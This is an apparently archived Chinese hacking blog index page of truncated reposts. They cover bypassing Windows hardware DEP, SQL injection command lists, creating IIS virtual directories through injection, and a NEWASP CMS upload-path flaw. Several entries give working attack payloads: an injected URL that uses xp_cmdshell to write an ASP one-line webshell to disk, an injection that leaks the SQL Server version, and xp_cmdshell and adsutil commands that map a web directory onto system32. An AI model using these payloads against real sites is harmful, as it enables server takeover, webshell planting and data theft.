Bypass Hardware DEP Tips
Author: axis
Date: 2007-04-27
http://www.ph4nt0m.org
DEP(数据执行保护),是windows针对溢出的一种保护措施,分软dep和硬dep,其中硬dep是需要cpu支持的,比较新的处理器一般都支持这个选项,可以在bios里去打开。简单来说,就是堆栈不可执行了,所以一般的在堆栈里执行shellcode的exploit,会攻击失败。
bypass dep也不是新东西了,目前最好的一篇文档是skape和skywing发在uninformed上的一篇。
http://www.uninformed.org/?v=2&a=4&t=txt
这篇文档写的很好,任何想学习或者研究bypass dep的人,都应该去仔细阅读这份文档。
这次由于metasploit里的dns 阅读全文 »
最详细的SQL注入相关的命令整理
鬼仔注:一样老文,存档。其实文中很多东西以前都曾经发过,不过这个是总结性的。发一下,方便我自己,也方便大家查阅。
来源:H4x0r's Blog
1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';–
? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2、 显示SQL系统版本:
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
阅读全文 »
SQL注入建立虚拟目录
鬼仔注:老文,刚才发 上篇 文章的时候想起来这篇文章,以前没发过,保存一下。
来源:H4x0r's Blog
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
阅读全文 »
web 和 数据分离
鬼仔注:以前有过类似的文章,在 这篇文章 的尾部有猪三以前写的“注射过程中DB_ONER权限并且主机与数据库不在一起的搞法”。
来源:混世魔王 de BLOG
web 和 数据分离,有Pcanywhere,数据库服务器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wodexi
阅读全文 »
NEWASP 新云CMS BUG
鬼仔注:刚在H4x0r那里看到的,很简单的英文,不会英文的,根据里面几个URL和关键字也应该能看出来什么意思,必须要求IIS 6.0,跟前段时间动易那个一样,利用Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷。不过新云的这个好像需要用NC提交,以达到修改上传路径的目的。
来源:H4x0r's Blog
HACK..
JUST,DO.IT!
I LOVE HACKED DOWN WEBSITE. HOHO~~~~~
This is BUG Only For > IIS 6.0 (Windows 2003 )
EXPLIOT:
HTTP://WWW.****.COM/(UPLOAD.ASP)
You can change upload is filepath…. -_-!!
阅读全文 »